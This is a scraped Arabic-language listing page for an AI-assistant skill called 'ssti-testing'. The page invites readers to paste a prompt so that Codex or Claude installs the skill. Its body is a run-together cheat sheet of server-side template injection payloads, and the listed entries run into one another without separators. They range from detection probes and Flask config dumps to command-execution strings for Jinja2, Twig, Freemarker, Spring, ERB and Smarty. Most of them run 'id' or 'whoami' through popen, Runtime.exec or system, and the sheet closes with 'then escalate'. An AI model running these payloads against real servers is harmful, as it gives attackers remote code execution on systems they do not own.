بنقرة واحدة
ssti-testing
Server-side template injection detection, engine identification, and RCE
التثبيت باستخدام Codex أو Claude انسخ هذا Prompt والصقه في Codex أو Claude أو مساعد آخر ليراجع صفحة Skill ويثبّتها لك.
القائمة
Server-side template injection detection, engine identification, and RCE
التثبيت باستخدام Codex أو Claude انسخ هذا Prompt والصقه في Codex أو Claude أو مساعد آخر ليراجع صفحة Skill ويثبّتها لك.
استنادا إلى تصنيف SOC المهني
Business logic vulnerability detection — workflow bypass, price manipulation, state abuse, and application-specific flaws
Detect PII, credentials, and corporate sensitive data in API responses, source code, files, headers, and database extracts
Detect and exploit SQL injection vulnerabilities in web application parameters
Test for authentication and authorization flaws including credential attacks, session issues, and access control bypasses
Detect and exploit cross-site scripting vulnerabilities in web applications
Discover hidden parameters, test values, and identify input handling anomalies
| name | ssti-testing |
| description | Server-side template injection detection, engine identification, and RCE |
| origin | RedteamOpencode |
{{7*7}} — look for 49 in response${7*7}, <%= 7*7 %>, #{7*7}, {7*7}, [= 7*7 ]{{'foo'+'bar'}} → foobar${{<%[%'"}}%\. — observe which causes errors{{config}} — dumps Flask config{{config.items()}} — enumerate settings{{self.__class__.__mro__}} — MRO chain{{request.application.__globals__}}{{_self.env.getFilter('id')}} (Twig <2){{['id']|filter('system')}} (Twig 3){{app.request.server.all|join(',')}} — server vars${7*7} → 49<#assign ex="freemarker.template.utility.Execute"?new()>${ex("id")}${object.class.forName("java.lang.Runtime")}{% set cmd = 'id' %}{% set bytes = (1).TYPE.forName('java.lang.Runtime').methods[6].invoke(null,null).exec(cmd) %}__${T(java.lang.Runtime).getRuntime().exec('id')}__::.x<%= 7*7 %> → 49<%= system('id') %><%= id %>{php}echo id;{/php} (Smarty <3){system('id')}{{config.__class__.__init__.__globals__['os'].popen('id').read()}}{{['id']|filter('system')}}<#assign ex="freemarker.template.utility.Execute"?new()>${ex("id")}<%= whoami %>id, whoami, then escalatesubprocess.Popen or os.popen__subclasses__(), __globals__, __builtins__